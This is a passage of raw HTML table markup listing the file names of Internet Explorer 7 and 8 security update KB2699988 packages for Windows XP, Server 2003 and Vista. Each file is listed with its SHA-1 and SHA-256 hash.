class=\"sbody-td\">00FF897A3CA089140C14CF41CB4D8EEBA54D192F</td><td class=\"sbody-td\">42EDB8FB4F6285864AAB6759583B9D6D0D16767F54ECE6B11DF7A15860248C80</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-ptb.exe</td><td class=\"sbody-td\">7B21F73AADCC2529FD6968FECE22118503FBD17A</td><td class=\"sbody-td\">709D65B75F588FFB5FAF2B945705C11E482909436460AF3BDBBF34CCD1895034</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-plk.exe</td><td class=\"sbody-td\">B89C258E5212B6EA179D0F4668051927CCCD0B10</td><td class=\"sbody-td\">F7A3B08F77E85610F4531B397A3D7FAAEA91A5194A9DA2380EADA3F91F2CD56E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-trk.exe</td><td class=\"sbody-td\">A087F347C49B6E532A7F8A9A5D47E027E1FA4ABB</td><td class=\"sbody-td\">84A1C02AE0DBB9951BA6AE8488ABED944DB669F306ED4C0F6323E4B15F5B9DD4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-deu.exe</td><td class=\"sbody-td\">250178E27BEE432E81DFB0610A8E8FC704099FBC</td><td class=\"sbody-td\">96AEC5CFEAAB0C935AE875A7215A1A1D83AFAE1148FCF03E9EF1EEA3B02680CF</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-ara.exe</td><td class=\"sbody-td\">7047D0AAA08F52157D9F1192AAC7E56939FAE19E</td><td class=\"sbody-td\">07BAED225502C71E3EDE0CF0CC8DC4AACEDA778D8CCF945E932A36FC8ADD3992</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-chs.exe</td><td class=\"sbody-td\">8CFCD420CF20C2BB4B90D3F222F641725799499B</td><td class=\"sbody-td\">36C630DA013E0F7D01DC2FCBB8868DAC5EDF21D3B6FFC39E8809DB367E2EC945</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-cht.exe</td><td class=\"sbody-td\">A6A447F1DE44AFB6C14B7201E02B3D4B5417D755</td><td class=\"sbody-td\">ED408F573F26AED196E7B5E24693626F20257AD5FE4782C32371317041A56C3B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-ell.exe</td><td class=\"sbody-td\">D4E033E4FB8433680667D82695FC7D9F4D7793EF</td><td class=\"sbody-td\">FA7D0F5E769F533F8F79759E6EBBC86CC734B9BDFE856E8057E1F8A8628311CB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-fra.exe</td><td class=\"sbody-td\">9CD9284453997F5944F1B973722E731FF76CEDC8</td><td class=\"sbody-td\">42126089607DB426446A8CCE05F5DB57D02F5902543DBAC35F39365DA7708BBA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-ita.exe</td><td class=\"sbody-td\">17B9A0B91B9ADB37E9B108FB8E1E3A9B07564D04</td><td class=\"sbody-td\">B24F51890C536BD0C383872EC748DA4008EB8A69B20CBFF624447ACFE7EEC3A0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-jpn.exe</td><td class=\"sbody-td\">383C44586CDCE6A6028D78CA6E0D496AFD8DE783</td><td class=\"sbody-td\">F11FE6AE375E32EFD9AE1B1A88F901E2D1954E7651F3C7A674B16F0A6CB68EF7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-kor.exe</td><td class=\"sbody-td\">C272BC3937C0F61CD97F63B6BEB686BFBA976630</td><td class=\"sbody-td\">7CC02D2479F96D9FE543FA3770441B3E8E195A476CE539F14894CBF8DE8920A7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-ptg.exe</td><td class=\"sbody-td\">BF07E353DC1FB99248F3DEB42AA0134F526A4B58</td><td class=\"sbody-td\">3ECE27F0C28618E1696499C355A998464F7F355891F49740FE5C9279D4B79BDC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-ita.exe</td><td class=\"sbody-td\">7CA97C8553705D5008CD7861C40CC37402DDBADB</td><td class=\"sbody-td\">C6D7937D45A0AE56C32BE5D7EA678292D48BCDA791E6D03F61C73C50A30555C8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-heb.exe</td><td class=\"sbody-td\">66DDF35E91D63DCF6465B42FFBFDE0391AFFBAB8</td><td class=\"sbody-td\">985AEC213560E5137EE356997540B11326CC8209193CEF52BD2E9909B77A9A2B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-enu.exe</td><td class=\"sbody-td\">4B54037D71B51DE5E40CEBDD74CBD92891C23EC2</td><td class=\"sbody-td\">EA7369ACBB1F4930F40D0CA9D790325C80703CC7C3990A5008882D4CC500C065</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-deu.exe</td><td class=\"sbody-td\">0F1552EAA72EC08131FF8522E04B249323D4AA0F</td><td class=\"sbody-td\">E2C074E9EE049F73AD523046E26DFB5EF95D168BDE3B21519C7B03A2B7F1FF55</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-chs.exe</td><td class=\"sbody-td\">58BEB55C699CD6F39E2E3FDEFC658B7196309D3A</td><td class=\"sbody-td\">E1C19E133332619AF31A852513077731A7C093D4A85A88A4C2543FC3C14484A8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-cht.exe</td><td class=\"sbody-td\">3FBFD6F2C3B9A3BDC3AE73439A4120D1957A3FE4</td><td class=\"sbody-td\">5A126A41B6409CA317A16200BBECFDF0448123963DF7C7BB00CCC43353DDDBD8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-ell.exe</td><td class=\"sbody-td\">86A43D6105FC1A27C44BA64601F96262A2377643</td><td class=\"sbody-td\">ECA4215216700436EA1DF522A903B8ACAA09FBD0F4744338987C5740A8221233</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-fra.exe</td><td class=\"sbody-td\">CC34FFDB979DE35EAC6728FA092B8E23B64F3A50</td><td class=\"sbody-td\">C6566C046EC063BA9AAC19FC0183AF601B58F1BC4060DD871A6975C7C43F9EC3</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-ita.exe</td><td class=\"sbody-td\">0C78B3D3D0EDF32BA42FD345531910A6B281A57F</td><td class=\"sbody-td\">EEC81D39C3D75C185F5D2CAE7B03FD0F520417E7E65F233EF9F52C9861F24E6F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-jpn.exe</td><td class=\"sbody-td\">8B4A900F0C6D943E75C102F713CA2555474C1103</td><td class=\"sbody-td\">80376E7C2BC372D2FF5026EC679E22EC0F6F0F9D3377B458399635C10A3B603F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-kor.exe</td><td class=\"sbody-td\">869B077D8EFF61C4CA075EDCB76225EBE136F993</td><td class=\"sbody-td\">EABB035F20B2518B45607A84154CEB8716ACC7797D7E593A5948EAD7DA94D268</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-ptg.exe</td><td class=\"sbody-td\">F73024C7AD43C1884F7A91DD899E3D6A974E34BB</td><td class=\"sbody-td\">64C326628BA01DD03C57A78C2C2AD0CD6002C1F0716D99DFC5D44B104AF06DEC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-ara.exe</td><td class=\"sbody-td\">611DE842AC9F471A5EE46FD29C7702717CBFF8A7</td><td class=\"sbody-td\">CEC615BA53FCB3791976CEB26BAD4846A65DC26C644F29E7CDCCD9630DA6308E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-trk.exe</td><td class=\"sbody-td\">47077E225965D2245C4D49AADECD6FEEA79A6F27</td><td class=\"sbody-td\">9F7603A43F1CAC6E15B8C8457638F25299AC7828089855740E0F3CCB03901419</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-csy.exe</td><td class=\"sbody-td\">9E2F37DC2E148C19EA6FB455C54602429C3CF683</td><td class=\"sbody-td\">B66788F4BF62235451DE65AA1E49D3C0D7D35DD820CAE320A9B64EE5AABF3EFB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-dan.exe</td><td class=\"sbody-td\">20F2514D4E2C953B024650E9CEA4B35B682BCF6D</td><td class=\"sbody-td\">2BD68162D487AA2E70114000B0508FB9B1AEAD0EB9822895D377C8B38880DDC5</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-heb.exe</td><td class=\"sbody-td\">65A0A789EB052734CB9F303C463AC74CA66FDF61</td><td class=\"sbody-td\">1BD09E9762984F150AB8FA738C4B4157FC69A8D515A5220749BAA20259ABC198</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-hun.exe</td><td class=\"sbody-td\">E2EA19AEB97950EC747D341A3DD2C111C8A7138E</td><td class=\"sbody-td\">A297C533ED4AF43378599279C251BB577FA6A576D4516211B36F733A204E5C44</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-plk.exe</td><td class=\"sbody-td\">A81FE41CCF416F78C2642B3A3C369002614C2CF6</td><td class=\"sbody-td\">6E1EFB3904CB480D221AE4D5E2DC1B2F22F727E9291047AD32473868E51A85EA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-nld.exe</td><td class=\"sbody-td\">CDCDD0ACF4D68F57130C4D4186A1A6948E86E995</td><td class=\"sbody-td\">B08FBD28E9EB22DF2F36BDC339152E5F44E6C89B18B810A25E89C7A326299504</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-rus.exe</td><td class=\"sbody-td\">683968105F8910354B8D0449E5E93AAF47C9867E</td><td class=\"sbody-td\">E7259D5FFCA15E5D3676B7FEB810C9E8C75F42DE9B26BE81619F513C37B33066</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-sve.exe</td><td class=\"sbody-td\">5EA55E5B27D6F786B98343634B234F619FDE6698</td><td class=\"sbody-td\">E05EE9C76E8275DC5640645E543EF19AAEC6441EAFC30E0BD158EDA17508EDD5</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-fin.exe</td><td class=\"sbody-td\">9390F00404DE57046C8C5729612D5D00EB5868C8</td><td class=\"sbody-td\">4979C4773DDA706DBD0F26CD583D6CE6C0A8E615C269EC1F284DF734F6ABA280</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-esn.exe</td><td class=\"sbody-td\">13D40A0E67AF1D9CAA41E5856153913B4C1446CE</td><td class=\"sbody-td\">706B585BBF2045B65D98FF79CB22477B137D96C2161214A2CA82772C2D9310D7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-nor.exe</td><td class=\"sbody-td\">E706400DA83F148690488B1E3486B08BBD46C57A</td><td class=\"sbody-td\">741130172D5839E9AF1D62F274253B68BC4E659EAFC4447EAC4C358C74EF309C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-custom-ptb.exe</td><td class=\"sbody-td\">B7966832F8670D9DC9E45B957E97B7E26F197384</td><td class=\"sbody-td\">4A7A5FB6D1D928536203C066C4A8407CBD682609EC7DB8B8E01C6AA2FB17369D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windows6.0-kb2699988-x86-custom.msu</td><td class=\"sbody-td\">87F046BDE2485015FB54C21DD1A6FFC27B36FED9</td><td class=\"sbody-td\">73FD742B8343E233F91A332E9E1CD8A07C1D2AD2B0B9E761163D2CC4B24B1472</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-sve.exe</td><td class=\"sbody-td\">0B51AF449DD60451F5DB7187083796C19158500C</td><td class=\"sbody-td\">90AB41C5657DE4942A62E4D12D977C14059E38542028D4434AD951DA33D09E01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-ia64-enu.exe</td><td class=\"sbody-td\">9BF292AF89FBBE09B92D0A2FD40E65E98B456D23</td><td class=\"sbody-td\">4A0C3CDFDBB102EBEC254FC57D867DA561F612809899EA0B211449CE03B62577</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-ia64-fra.exe</td><td class=\"sbody-td\">884A078B24E4A54A21E43FCBF40D40F8C0BC3AA3</td><td class=\"sbody-td\">D0C21CA28CFD902277AB0258FC72B8C6092018A06C1D69311EFC1563542A1A28</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-ia64-deu.exe</td><td class=\"sbody-td\">3206104956B57FE260DB42316F624406BDE9FA4D</td><td class=\"sbody-td\">73EDB297EA162F6E3C79BE864A6D6519A362B9559FA676F597F563DCB9959F9D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-enu.exe</td><td class=\"sbody-td\">A81616A7CE0D3B51099EAEDA61277341D4047E73</td><td class=\"sbody-td\">88EA3E11229A6194751E1A56A0812D2FEF568D2C67703EFE7766358BDFE43477</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-plk.exe</td><td class=\"sbody-td\">F411F9525D70DF6AB85C449451CD2BA3DDEB84AB</td><td class=\"sbody-td\">CA84FF5F07D1B552A822CB83BAF503E155CB99FC9CA390BC4E1E336C6621F540</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-ptb.exe</td><td class=\"sbody-td\">5A33C1A072A2A08FCD239C3676B2CA8EA0218FE1</td><td class=\"sbody-td\">B2D83D61E274F9C647BE23B8214F166394FAD20297759495C45EB867619B862E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-hun.exe</td><td class=\"sbody-td\">B509651B6DEC8AD7EC2A8D4B01BBA292DF589AA7</td><td class=\"sbody-td\">1B39875899ECCE43FC97880453A72B96110706CE3255B774986D966400AC05AD</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-esn.exe</td><td class=\"sbody-td\">AC1B97DCC522E7599A89321750F7517180FC9F08</td><td class=\"sbody-td\">422844F2EE87B996D4693762AEF8D4FCF3148DDC621B4CBB3202748BC1561016</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-ita.exe</td><td class=\"sbody-td\">EFC8E666C8E989901B4FF64A52C045FD35D30F8E</td><td class=\"sbody-td\">238590A1A8A1A0857376B57ADABC67B1B08B3C9C3271EDFAF37120A7F6AAA052</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windows6.0-kb2699988-x86.msu</td><td class=\"sbody-td\">A24767B084E0C0613E270C951BB132572BE49031</td><td class=\"sbody-td\">1D8B3FE110C263A84B0F6BBD0CAEAD6B25519682E2307A3C8D65BF711B2AB88E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-enu.exe</td><td class=\"sbody-td\">627C747568C1E21CC2711693E8AABE9E0A5CE6EA</td><td class=\"sbody-td\">BF8F7D43626AE5BFD1E68B27A6A365DF9C044A14DCF7A2595E607CF1214B8DC1</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-fin.exe</td><td class=\"sbody-td\">5AF8ED7189E1C3B35CDCF76AFDC2AAE8670E713B</td><td class=\"sbody-td\">4C17020A572988B01AEB7582BCB104EE0EB69CBA2F6852BBF507022AB1165172</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-csy.exe</td><td class=\"sbody-td\">B879485954774CFD5CF1B9892CBF8DAD5584BF95</td><td class=\"sbody-td\">60F1C6A4AAFA612E82E67F760BFDC0EF7CAAD7D7A039BC292F4E0EC40DF01405</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-esn.exe</td><td class=\"sbody-td\">AEA6E2F646268DE066B110472EC56618FD19F580</td><td class=\"sbody-td\">7E921E9100B967DECAE1E36F011B41F0DC0843AFFB7293224C1085BF19F46FD9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-heb.exe</td><td class=\"sbody-td\">A338ED9E9959B4C933CA5662F11D8B46BD4659A4</td><td class=\"sbody-td\">A65558846B6FFD7F5F949AA77A6994006FEF7BA7B5009C31D7E84B38CBDE2AD4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-hun.exe</td><td class=\"sbody-td\">22E4CD28A2A260A2328F988513230FBA30A0D29E</td><td class=\"sbody-td\">78A2F1C937101C09B15F18B22A82C8180D17DB5A9D5CE0E83CDAD945DB906B51</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-sve.exe</td><td class=\"sbody-td\">2C0FE3C0002A9A683157BE6E03127C7C993B5B88</td><td class=\"sbody-td\">5C0252FDA179573B266ABE1CA31AE8A20DB7AB3031FCC445D2A33E17DF54B14A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-rus.exe</td><td class=\"sbody-td\">1271C5343F3C1D5F9AEFBA0DA3E02EBEE89CF141</td><td class=\"sbody-td\">CAB5FD059EEF1E2582F1F9FE27F0423B9A6996B9A28BF43CF9B278AFA92F0D76</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-nld.exe</td><td class=\"sbody-td\">E6B4ACE0F24AF6DFE51CB6F42AD169F794CE967E</td><td class=\"sbody-td\">9B674CC1DCEF4EBEDE1F0135F27740562546C479C2A482501A6E2A9AB4E708B8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-nor.exe</td><td class=\"sbody-td\">24AF0D8820C4E915785D165F63148397C8F2277F</td><td class=\"sbody-td\">A639E65327BD89BE17D72EC50258248D09F40B6FDA0BBC5E34BFF71CB883C387</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-ptb.exe</td><td class=\"sbody-td\">F6E4B876CF90C2DE18F59E51AF33B9D8E1A428AA</td><td class=\"sbody-td\">1195A57A4D6A56FFCDFA65E3534B7178D91BE2ECB97B62F903B7EB07D06A451B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-dan.exe</td><td class=\"sbody-td\">2E3C68C7A5FE0A597EDD5BE81A83C954729794E7</td><td class=\"sbody-td\">5459A7F7A8683249FD5D9F66C094A8B80EA7F9CA9058197AEFAE652D4EAEF647</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-plk.exe</td><td class=\"sbody-td\">547377A435002F398FBB4FE5B171B06401DFAEDF</td><td class=\"sbody-td\">9B5B3B95C25547F4E06DA645DF92A187D2E74E354A17AD3C123F1358342B1A92</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-chs.exe</td><td class=\"sbody-td\">7A3846DA2D63E81497E41D911678221E006DA4D6</td><td class=\"sbody-td\">AC33C7F7F4BDF265CC060E578CBB2274285AEE36370B292E1AC22CB14331BE12</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-cht.exe</td><td class=\"sbody-td\">3BB4449248FB21F0C653F80AF0E9E6B14F1A66AA</td><td class=\"sbody-td\">D5625D0636064ED40E42C4C220D3487D92DF726CE28469BE58BD1EF1B36E928C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-ara.exe</td><td class=\"sbody-td\">50EF1C981FD9242598E8ED74EF283C73173B3701</td><td class=\"sbody-td\">EF50E1C339F4C2CC816600845D6569BF7023BD1BFD6D2ED44A95066F7CCC9554</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-fra.exe</td><td class=\"sbody-td\">91C217E1837A2CC757D1C0EAC8169A3BF4D9B430</td><td class=\"sbody-td\">C3D06C2BD604277CA518AFF758651C0571CD880B45436DEC972FCA457A0B3FCA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-ita.exe</td><td class=\"sbody-td\">C5954275F75D0A8D00A0082DF814342252F5E287</td><td class=\"sbody-td\">B2262D687B2229EC733350211B896043A37E3B2A7B6F88A05BE46C95F3423E8B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-jpn.exe</td><td class=\"sbody-td\">412FE146E85D7ED2DFFC02B13743580B1229DE1D</td><td class=\"sbody-td\">3F135D9D4A6B056D42BEFDFFC4A157685DB1E1CE0D8C1BBAC220969C0C92BB18</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-trk.exe</td><td class=\"sbody-td\">3E26B00A9B993B3A2FCBF704A84F214F19960F86</td><td class=\"sbody-td\">16BF78D26D068DBD4F6D38DC64B7CA97A663E1633D58BD1EC71273B7CC1C6CC4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-ptg.exe</td><td class=\"sbody-td\">77D39CEDB7A9DE60082A2452EA8643F67093ED2A</td><td class=\"sbody-td\">79843378318633F913626E8B68D175606C3C99B805124F0CDF4DA61780C18DD0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-deu.exe</td><td class=\"sbody-td\">3C4CA53D53CFB32790DC0EC81CA9E3109D10309A</td><td class=\"sbody-td\">FED6BB1DDC0EE120706F7D34BB0311223EF869120E43B2C63D7572716A2A8C3F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-kor.exe</td><td class=\"sbody-td\">3255B624EF7531FE0AB4AB804D274C1336CB749A</td><td class=\"sbody-td\">26E8D1B3EFCB6142530178E7A4DD10D66115F050DDD32C93423D12FB62C54C08</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-ell.exe</td><td class=\"sbody-td\">9BDE62C34C5A31F717A95C257B5DAD53CE79A459</td><td class=\"sbody-td\">12C3F40E7FAD037400EA71E80ED5BC5B5CFB047E981FAE330D1B46171F37BE33</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-rus.exe</td><td class=\"sbody-td\">B67B100A68BFE5C18C48BEB99F34D5DF65B4FB1E</td><td class=\"sbody-td\">F068E9358E5AB3E2D812D550A3DFC4EE24C1D356E4C1686DA2D533A9A7974B7F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-sve.exe</td><td class=\"sbody-td\">3CD1A55606A0BC5D4AE58AF2C22869A9473AECE0</td><td class=\"sbody-td\">5869D94E1EA12E706018CAE16569DD7DFB273702813EA00825197ED57DAD9015</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-esn.exe</td><td class=\"sbody-td\">6F5B01D41FF6A9EBB00D40668321CD78BE6F896A</td><td class=\"sbody-td\">39B4936F0B257EE481074859FC79408DBB7181D300DD306B50FAD40BD48DD7CC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-fin.exe</td><td class=\"sbody-td\">EF87D8C33143C99124B729C7C303D0F46A90D3D5</td><td class=\"sbody-td\">BFE0D0EFC56BA4E571DFEC54E25165E4804BBE28085AEB47D3192D643C1F8555</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-dan.exe</td><td class=\"sbody-td\">C89A99CB92C3EED42021C891E65A5536B7732672</td><td class=\"sbody-td\">E507E6D84FA6901C9F683C32B01C84D52FA2C531E7574DCE03CE6124C81BAF67</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-heb.exe</td><td class=\"sbody-td\">9D6256F165B6987E68FBF3063CBA4D2063F0819F</td><td class=\"sbody-td\">7F3408538C43F3CCADD13EEC833B86A2196C94F5112C2D4154A680BF78D02541</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-nld.exe</td><td class=\"sbody-td\">514BC69C3C2A6615BCC6410C293E6B9BBF389313</td><td class=\"sbody-td\">7400B76A4AD3A67A28FA47F2C6CC2427EDFC1257232362C70AF60E0E5F4D6DD4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-ptb.exe</td><td class=\"sbody-td\">E08874BE1C472C4F54830C3A89678DC7E31706C9</td><td class=\"sbody-td\">DB6239501C6374737B42ED389F576E4B9CC7B5AB925CF23225FE7237897BC67C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-csy.exe</td><td class=\"sbody-td\">B4FFB29252F43F0FF91A0EE26A563EAE99837828</td><td class=\"sbody-td\">02FD91DEECDD6EDB058BD4B498A8429ED2A19E919A324ACBC1A16223D52CC26B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-nor.exe</td><td class=\"sbody-td\">93669F99BBD3BDAC3F3C1D46C06C13FD17EF289A</td><td class=\"sbody-td\">EE01CFF57C560AC76E93794520CE4D983257B3D906F39E03FB7984E9A2A08635</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-hun.exe</td><td class=\"sbody-td\">5F60CADADC9024015ACD01D3D83CEB18CA8DE77E</td><td class=\"sbody-td\">A632F721C4E95D13D12791061E125600790D942F5E3FB54994E6499BDF64AE93</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-plk.exe</td><td class=\"sbody-td\">8A720D7DB6FD302169973BD7FBDA1744A20E607B</td><td class=\"sbody-td\">5E3AF1932818AF5BA49F9D2B41B3E3AEEE1C195600B3D3CDE0428FF081B6FB39</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-trk.exe</td><td class=\"sbody-td\">9E74B3098A9194A5B56CFC1DA1140654F21FE236</td><td class=\"sbody-td\">7561F39798A58CA17B7CE69EE8A10039C0BC085F7351085F7663A790BEFF2698</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-ell.exe</td><td class=\"sbody-td\">C2E6782F96581A34A97A5923DF9B6E40F32AD472</td><td class=\"sbody-td\">AAEC8EE11ABD653753518E4CD70E468A83818D154AC6F145A7FF1FA63DFC4132</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-deu.exe</td><td class=\"sbody-td\">3C28E9CE3DE9FFC4BABB83109AD578B9B01C880D</td><td class=\"sbody-td\">76CFEDC57448FF3C4582059A9B78569C21F7B8AB7C4A35DB40DF516B02A1BC39</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003.windowsxp-kb2699988-x64-enu.exe</td><td class=\"sbody-td\">AAEDE07C9A94A51F39345F8B6C360AFFEF733237</td><td class=\"sbody-td\">F1DCA1495ADBEE9868458025E1BF7776465611A275571DD854AB6523B29D8DF6</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003.windowsxp-kb2699988-x64-jpn.exe</td><td class=\"sbody-td\">A3C33B0AA97F7EEC668EF478E78EC8CD64526675</td><td class=\"sbody-td\">0DF85E4BCF4877CDCE577A6E32532471ABB23792C2CBC630821412B967259EE4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003.windowsxp-kb2699988-x64-fra.exe</td><td class=\"sbody-td\">3950B9E1C8BCE927EAF103C2FA26A0E87A2668E4</td><td class=\"sbody-td\">5400C1EFE2A011851186547EB8E88740CF5AB61C343C46993C17C2275BCF8318</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003.windowsxp-kb2699988-x64-ptb.exe</td><td class=\"sbody-td\">1929547CF2B0E91C9C4D284C026BF2CF6B7586E9</td><td 